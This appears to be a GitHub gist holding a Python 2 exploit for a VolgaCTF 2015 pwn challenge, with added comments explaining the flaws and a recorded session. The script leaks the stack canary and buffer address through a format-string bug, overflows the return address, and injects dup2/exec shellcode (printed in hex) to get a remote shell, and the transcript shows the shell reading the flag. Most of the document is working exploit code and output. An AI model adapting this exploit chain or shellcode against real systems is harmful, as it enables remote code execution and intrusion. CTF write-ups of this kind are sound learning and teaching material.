@g05u
Created May 3, 2015 15:39
Exploit Little Pwnie VolgaCTF
#!/usr/bin/env python
import struct, sys, time, re
from nulllife import *
import requests, urllib
# Volga CTF 2015
# exploit my little pwnie
# www.null-life.com / @_g05u_
# Review note: both weaknesses this script depends on are visible in the payloads
# themselves: user input reaches a printf-style format string (the positional
# '%N$08x' conversions below read stack slots back out, CWE-134), and the echo
# buffer can be overrun far enough to reach the saved return address and the
# stack "cookie" (a buffer overflow, per the flag text). Either refusing
# non-literal format strings (-Wformat-security / a constant format) or bounding
# the copy breaks the chain on its own; note that the canary only fails here
# because its value was leaked first. Inputs carrying '%N$' positional
# conversions are an easy detection signal for this class of bug.
#
# All network I/O goes through the third-party nulllife NullSocket helper; the
# readuntil/readline/write/writeline/interactive semantics are assumed from
# usage below, not verified here.
FD = 4  # file descriptor passed to the dup2 shellcode; also appended as a raw byte to the first payload
s = NullSocket('pwnie.2015.volgactf.ru', 7777)
#s = NullSocket('kali64', 1337)  # local test target used by the author
# Two nulllife shellcode fragments, left-padded with NOPs (0x90) to exactly 58 bytes.
shellcode = NullShell('dup2').get(FD) + NullShell('exec').get()
shellcode = shellcode.rjust(58, '\x90')
# Step 1: leak the 26th format argument as 8 hex digits. The slice [6:-1] drops a
# 6-character prefix from the echoed line and the trailing newline -- presumably
# a fixed echo prefix from the service; confirm against the server output.
print s.readuntil('back: ')
s.writeline('0x%26$08x')
cookie = int(s.readline()[6:-1], 16)
print '[*] Cookie: 0x%08x' % cookie
# Step 2: leak the 6th format argument and subtract 0x70 -- presumably a stack
# pointer from which the address of the input buffer is derived; 0x70 is the
# author's measured offset, not something derivable from this script.
s.readuntil('back: ')
s.writeline('0x%6$08x')
shellcode_addr = int(s.readline()[6:-1], 16) - 0x70
print '[*] Shellcode Address: 0x%08x' % shellcode_addr
# Step 3: '%138x' expands to 138 bytes of output; together with 16 filler bytes
# that places the packed address at the author's measured position of the saved
# return address. Why chr(FD) is appended is not evident from this file.
print '[*] Overwrite RET'
s.readuntil('back: ')
s.write('%138x' + 'A' * 16 + struct.pack('<I', shellcode_addr) + chr(FD)) #overwrite ret
# Step 4: write back the leaked cookie value plus one (low byte non-zero),
# terminated by a zero byte.
print '[*] Overwrite cookie'
s.readuntil('back: ')
s.write('%122x' + struct.pack('<I', cookie + 1) + '\x00') #overwrite cookie
# Step 5: a shorter write whose terminating zero lands on the low byte of the
# cookie, restoring the original value (per the author's comment).
print '[*] Overwrite null byte in cookie'
s.readuntil('back: ')
s.write('%122x') #set null byte in cookie
# Step 6: send the 58-byte shellcode followed by a terminating zero byte, then
# hand the socket over to the user.
print '[*] Write shellcode'
s.readuntil('back: ')
print '[!] Shellcode: %s' % shellcode.encode('hex')
s.write(shellcode + '\x00') #shellcode plus terminating null byte
print '[***] Got shell!!!'
s.interactive()
# Session transcript recorded by the author (kept verbatim as a module-level string).
'''
$ python xpl_pony.py
This is a simple echo server. Type exit to quit.
Type string to echo back:
[*] Cookie: 0x5b1a5400
[*] Shellcode Address: 0xffcadbfc
[*] Overwrite RET
[*] Overwrite cookie
[*] Overwrite null byte in cookie
[*] Write shellcode
[!] Shellcode: 909090909090909090909090909090909031db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
[***] Got shell!!!
I strip this awful symbol
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ls -la
total 908
drwxrwxr-x 2 ubuntu ubuntu 4096 May 3 05:33 .
drwxr-xr-x 5 ubuntu ubuntu 4096 May 3 05:24 ..
-rwxrwxr-x 1 ubuntu ubuntu 9720 May 3 05:24 my_little_pwnie
-rw-rw-r-- 1 ubuntu ubuntu 28 May 3 05:24 you_can_find_flag_in_this_file.txt
-rw-r--r-- 1 root root 900476 May 3 10:52 zzz_logs
cat you_can_find_flag_in_this_file.txt
flag{fmt_string+bof=exploit}
exit
*** Connection closed by remote host ***
'''